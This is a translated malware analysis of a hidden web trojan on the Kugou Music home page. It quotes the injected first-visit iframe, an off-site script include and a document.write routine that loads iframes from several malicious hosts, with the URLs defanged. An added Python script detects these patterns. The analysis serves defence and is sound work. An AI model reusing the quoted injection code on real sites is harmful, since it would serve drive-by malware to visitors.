Detailed analysis of a hidden Trojan on the Kugou Music home page + 72 Trojans

Author: yimike
Source: jianmeng

Recently some friends reported that the Kugou Music home page had been implanted with a Trojan. The strange thing was that antivirus software only flagged a web Trojan the first time the page was opened; after that, no matter how many times the page was refreshed, nothing was reported. Following this clue, I opened the Kugou Music home page (h**p://www.kugou.com/home) and eventually found an extremely well-hidden Trojan.

The detailed process is as follows:

1. The page code of h**p://www.kugou.com/home looks normal, but it contains an iframe:

<IFRAME marginWidth=0 marginHeight=0 src="cairing.htm" frameBorder=0 width=230 scrolling=no height=327></IFRAME>

Here cairing.htm points to h**p://www.kugou.com/home/cairing.htm

2. The first time any given IP address accesses h**p://www.kugou.com/home/cairing.htm, the page source contains the following code:

<IFRAME id=cif123 src="h**p://count12.5lyes.net/sa.aspx?s1=0&s2=1214155605&s3=82585631941791&s4=1001282043&s5=621d5&n=0.5986579168677271" width=0 height=0></IFRAME>
<SCRIPT language=javascript id=clickjs src="h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001"></SCRIPT>

When the same IP address accesses the page again, this code is gone. In other words, the Trojan on the Kugou Music home page is probably related to this.

3. When an IP address accesses h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001 for the first time, the script reads the local cookies, checks whether the visitor is logged in to Kugou, and obtains the Kugou ID.
Based on this information it generates and writes an iframe; this iframe is the 51yes line of code in step 1.
The browser then loads that iframe.

4. Accessing the src address of that iframe returns a strange, unrelated link:
h**p://
The captured packet looks as follows:

Note the part highlighted in yellow: the link referenced from 51yes.net in the unrelated connection above is the iframe address from step 2.
In short, when the iframe pointing to 51yes.net in step 2 is accessed, the 51yes.net server returns this "unrelated" link.

5. Following the "unrelated" link yields the following code:

<script type="text/javascript">
// window.setTimeout('goo();', 1*60*1000);
goo();
function goo()
{
document.write('<iframe width=100 height=100 border=0 src="h**p://OK.dessp.com/mmmgo.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="h**p://ie.ietop.com/ms.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="h**p://arp.aafrp.com/mmmmgo.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="h**p://mm1.yaoch.com/mmgo.htm"></iframe>');
// document.write('<iframe width=100 height=100 border=0 src="h**p://representation></iframe>');
// document.write('<iframe width=100 height=100 border=0 src="h**p://representation></iframe>');
// document.write('<iframe width=100 height=100 border=0 src="h**p://representation></iframe>');
document.write('<script src="h**p://service.o00o.cn:8081/click.aspx?id=test_2"></script>');
}</script>
<script src='h**p://s35.cnzz.com/stat.php?id=817650&web_id=817650' language='javascript' charset='gb2312'></script>

At this point the cause of the Trojan on the Kugou Music home page is clear. It comes down to two things:

1. h**p://www.kugou.com/home/cairing.htm has malicious code implanted in it: <SCRIPT language=javascript id=clickjs src="h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001"></SCRIPT>
2. The sa.aspx code of the counter site 5lyes.net may have been maliciously modified after a hacker intrusion, or the server room may have been hit by an ARP virus that infected sa.aspx with malicious code (the latter is unlikely).

PS. The links above can only be reached with the matching local cookies.
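As an added defender-side example (not part of the original write-up), the following Python script scans a page for the three delivery patterns this analysis uncovered: a zero-size iframe like the one in step 2, a script include from a host other than the audited site like the clickjs line, and iframes that a script writes in at runtime the way goo() does. The sample HTML is constructed from the snippets above with the defanged h**p restored to http; the audited host www.kugou.com is taken from the page.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the snippets quoted in the write-up; the author's
# defanged "h ** p" is restored to "http" so urlparse can read the host names.
SAMPLE_HTML = """<IFRAME src="cairing.htm" width=230 height=327></IFRAME>
<IFRAME id=cif123 src="http://count12.5lyes.net/sa.aspx?s1=0" width=0 height=0></IFRAME>
<SCRIPT language=javascript id=clickjs src="http://service.o00o.cn:8082/click.aspx?sid=ad_3001"></SCRIPT>
<script type="text/javascript">goo(); function goo() {
document.write('<iframe width=100 height=100 border=0 src="http://OK.dessp.com/mmmgo.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="http://ie.ietop.com/ms.htm"></iframe>'); }
</script>"""
WRITE_RE = re.compile(r"""document\.write\s*\(\s*(['"])(.*?)\1\s*\)""", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)

def _px(value):  # integer width/height attribute, or None when absent or not numeric
    return int(m.group(1)) if (m := re.match(r"\s*(\d+)", str(value or ""))) else None

def _third_party(url, site_host):  # False for relative URLs such as cairing.htm
    return (urlparse(url).hostname or "").lower() not in ("", site_host.lower())

class IframeAudit(HTMLParser):
    """Flags zero-size iframes, scripts from other hosts, and document.write()-injected iframes."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host, self.findings, self._script = site_host, [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs); src = a.get("src") or ""
        if tag == "iframe":
            dims = [_px(a.get(k)) for k in ("width", "height")]
            if any(d is not None and d <= 1 for d in dims):   # width=0 height=0 as in step 2
                self.findings.append(("hidden iframe", src))
        elif tag == "script":
            self._script = []                                   # start buffering the script body
            if _third_party(src, self.site_host):               # e.g. the injected clickjs include
                self.findings.append(("third-party script", src))
    def handle_data(self, data):  # older HTMLParsers split script text at "</", so buffer and join
        if self._script is not None: self._script.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            for m in WRITE_RE.finditer("".join(self._script)):  # iframes written in at runtime, as goo() does
                hit = SRC_RE.search(m.group(2))
                self.findings.append(("document.write injection", hit.group(1) if hit else ""))
            self._script = None

def audit_html(html, site_host="www.kugou.com"):
    parser = IframeAudit(site_host)
    parser.feed(html); parser.close()
    return parser.findings  # [(rule, url), ...] in document order
```

Because the injected code was served only on the first visit from each IP address, a re-fetch of an already-visited page can come back clean; run the audit on the body captured by the first request rather than a later one.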

The following is the analysis of the Trojan chain, as crawl logs generated by FreShow:

